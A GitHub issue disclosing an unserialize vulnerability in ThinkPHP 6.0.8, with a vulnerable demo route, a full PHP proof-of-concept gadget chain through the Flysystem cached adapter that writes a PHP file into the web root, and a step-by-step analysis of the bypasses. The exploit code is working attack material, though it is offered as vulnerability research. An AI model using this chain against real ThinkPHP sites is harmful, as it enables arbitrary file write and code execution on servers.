Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

ThinkPHP6.0.8 exists unserialize vulnerability #2559

Closed
Y4tacker opened this issue Jul 2, 2021 · 1 comment
Closed

ThinkPHP6.0.8 exists unserialize vulnerability #2559

Y4tacker opened this issue Jul 2, 2021 · 1 comment

Comments

@Y4tacker
Copy link

Y4tacker commented Jul 2, 2021
edited
Loading

thinkphp6.0.8 has a unserialize vulnerability

Vulnerability Demo

Create Routing at controller/Index.php

<?php
namespace app\controller;

use app\BaseController;

class Index extends BaseController
{
    public function index()
    {
     if(isset($_POST['data'])){
            @unserialize($_POST['data']);
        }
    }

}

this is my poc

<?php



namespace League\Flysystem\Cached\Storage{

    use League\Flysystem\Filesystem;

    abstract class AbstractCache{
        protected $autosave = false;


    }
    class Adapter extends AbstractCache
    {
        protected $adapter;
        protected $file;

        public function __construct(){
            $this->complete = "*/<?php phpinfo();?>";
            $this->expire = "yydsy4";
            $this->adapter = new \League\Flysystem\Adapter\Local();
            $this->file = "y4tacker.php";
        }

    }
}

namespace League\Flysystem\Adapter{
    class Local extends AbstractAdapter{

    }
    abstract class AbstractAdapter{
        protected $pathPrefix;
        public function __construct(){
            $this->pathPrefix = "./";
        }
    }
}


namespace {

    use League\Flysystem\Cached\Storage\Adapter;
    $a = new Adapter();
    echo urlencode((serialize($a)));
}

The file has been generated in the directory in public
2

and
3

Vulnerability Analysis

First one starts with __destruct, autosave can be bypassed by assigning a value of true
4

Next we call the save method, because this is an abstract class so we need to find the method that implements it

abstract class AbstractCache implements CacheInterface

Here I choose vendor\league\flysystem-cached-adapter\src\Storage\Adapter.php

adapter variables are controllable and it feels like write may have a write operation so we globally search for the write method

5

finally at vendor\league\flysystem\src\Adapter\Local.php

6

The has method determines if the value in the location variable is an existing file, in order to bypass it we need a non-existent file name, the path is completely controllable

7

And this one happens to have the file_put_contents method in it

8

The value of contents comes from what we passed in earlier and can see is $this->getForStorage();

9

The parameters are all controllable, but we need to bypass the json_encode method, otherwise if we pass in escape symbols it will also output
10

Here I pass in */<?php phpinfo();? > will be commented out in front and followed by ? > is separated, causing the vulnerability, analysis is complete
@Y4tacker Y4tacker closed this as completed Jul 2, 2021
@LittleJake
Copy link

This vulnerability might only affect ThinkPHP 6.X?

This issue was closed.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@LittleJake @Y4tacker